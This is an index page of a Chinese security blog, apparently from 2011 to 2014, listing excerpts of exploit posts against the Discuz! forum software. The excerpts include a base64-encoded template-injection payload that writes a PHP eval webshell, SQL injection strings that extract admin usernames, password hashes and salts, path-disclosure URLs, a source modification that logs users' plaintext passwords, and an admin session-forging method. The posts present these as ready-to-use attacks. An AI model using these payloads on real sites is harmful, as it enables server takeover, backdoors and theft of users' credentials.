Discuz! 7.2 SQL注入exp getshell版

分类:安全 | 2014-10-1 | 撸过 1,421 次
1人扯谈

参数:

1.可直接getshell

2.爆管理账号密码

3.爆表前缀

如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。
[......]

继续阅读

DZ!2.5 后台拿 WebShell 方法!

分类:安全 | 2012-05-1 | 撸过 626 次
1人扯谈

直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。

1.注册任意账户

2.登陆用户,发表blog日志(注意是日志)

3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

4.访问日志,论坛根目录下生成demo.php,一句话密码C

这个必须是要开启seo

在这个地方。二个的都是这个地方。

最新更新的是能直接在贴子里面拿shell。。

利用方式也并非非得发blog,[......]

继续阅读

Discuz x1.5 – x2版本 二次注射

分类:安全 | 2012-01-15 | 撸过 394 次
0人扯谈

a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='

再给出一些语句。

',`subject`=(/*!select*/ group_concat(uid,':') from pre_common_member where groupid=1),comment='//查看管理用户
',`subject`=(/*!select*/ group_concat(uid,':') from pre_comm[......]

继续阅读

Discuz x2 泄漏服务器物理路径

分类:安全 | 2011-12-2 | 撸过 437 次
0人扯谈

地址:/source/function/function_connect.php

shell下轻松截获DZ X2明文密码

分类:安全 | 2011-10-11 | 撸过 585 次
0人扯谈

首先:第一次发帖,大牛请一笑而过

其次:这是通过简单修改DZ源文件,利用密码错误记录原理截取明文密码

呵呵,目的比较简单,不想跑那蛋疼的二次加密MD5,当然不是为了做坏事

目标文件:/source/class/class_member.php

 

先看错误密码记录部分,第200行左右

 

 } else {

 $password = preg_replace("/^(.{".round(strlen($_G['gp_password']) / 4)."})(.+?)(.{".round(strlen($_G['gp_password']) / 6)."})$[......]

继续阅读

DZ 7.2最新版爆路径0day

分类:安全 | 2011-09-25 | 撸过 562 次
0人扯谈

这里只是说下方法,在要爆DZ 7.2 bbs的网站后面加上以下代码访问,即可爆出。"manyou/admincp.php?my_suffix=%0A%0DTOBY57",引号不算。

例如:http://www.webshell.cc/manyou/admincp.php?my_suffix=%0A%0DTOBY57

Discuz 1.5暴WEB路径漏洞

分类:安全 | 2011-09-4 | 撸过 322 次
0人扯谈

测试环境:discuz X1.5+nginx 1.0

漏洞文件source/function/function_core.php,

代码:

$_G['setting']['domain']['app']['default'] && $content = preg_replace("/<a href=\"([^\"]+)\"/e", "rewriteoutput('site_default', 0, '".$_G['setting']['domain']['app']['default'].$port.$_G['siteroot']."', '\\1')", $con[......]

继续阅读

discuz sessoin hijack tips 续

分类:安全 | 2011-08-20 | 撸过 384 次
0人扯谈

前面发的是UCHOME,为免有装B的嫌疑,干脆DISCUZ论坛的SESSION劫持方法也一并公布了。转载请保留原始URL,谢谢.

 

DISCUZ X系列论坛的session和UCHOME不同,生成session使用的authkey不是程序的UCKEY,看看DZ的代码就了解啦:

 

1.浏览器类型和$_config['security']['authkey']加起来生成了一个全局的authkey

$this->var['authkey'] = md5($_config['security']['authkey'].$_SERVER['HTTP_USER_AG[......]

继续阅读

discuz sessoin hijack tips

分类:安全 | 2011-08-19 | 撸过 1,841 次
0人扯谈

捂了N年的一个东西,今天公布了吧。

当通过DISCUZ系列程序的SQL注入漏洞,获得用户的HASH和ucenter的uckey后,其实是可以直接构造管理员的session的,然后在前台以管理员的身份做任何操作。

DISCUZ论坛验证了登录的IP和浏览器类型等,不过大家看看代码就会知道怎么绕了,而uchome弱一点,没有IP限制,我就拿uchome举例说说这个方法:

 

1.首先member表中存着用户的HASH,这个是和ucenter互动的,用户登录的时候会更新。

 

2.用户登录后,会在session表中保存记录。

 

3.如果对方登录以[......]

继续阅读

Discuz 1.5 - 2.0 二次注入细节(已出补丁) - 脚本漏洞

分类:安全 | 2011-08-19 | 撸过 622 次
2人扯谈

By:jannock

今天才发现,discuz 昨天又出补丁了。唉,又少一个玩了。这里说一下细节让大家共同学习一下吧。

在发表回复的地方输入注入语句:

a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='

然后到回复补充那里随便补充一下,注入语句就被执行。

补充的地址:

forum.php?mod=misc&tid={tid}&action=postappend&pid={[......]

继续阅读